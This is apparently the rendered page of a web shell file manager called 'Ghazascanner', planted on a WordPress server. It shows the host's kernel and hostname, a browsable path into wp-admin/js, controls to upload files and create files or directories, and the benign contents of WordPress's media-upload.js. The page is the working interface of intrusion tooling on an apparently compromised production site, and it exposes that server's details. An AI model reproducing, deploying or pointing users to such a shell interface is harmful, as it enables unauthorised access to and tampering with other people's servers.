@Ghazascanner
_2019runbot
Ghazascanner File Manager
server :Linux hosjweb-prod2 6.12.0-201.74.2.2.el9uek.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 30 17:11:35 PDT 2026 x86_64
Current Path :
/
homepage
/
wordpress
/
wp-admin
/
js
/
Path :
Upload File :
New :
File
Dir
/homepage/wordpress/wp-admin/js/media-upload.js
// send html to the post editor function send_to_editor(h) { var win = window.opener ? window.opener : window.dialogArguments; if ( !win ) win = top; tinyMCE = win.tinyMCE; if ( typeof tinyMCE != 'undefined' && ( ed = tinyMCE.getInstanceById('content') ) && !ed.isHidden() ) { tinyMCE.selectedInstance.getWin().focus(); tinyMCE.execCommand('mceInsertContent', false, h); } else win.edInsertContent(win.edCanvas, h); }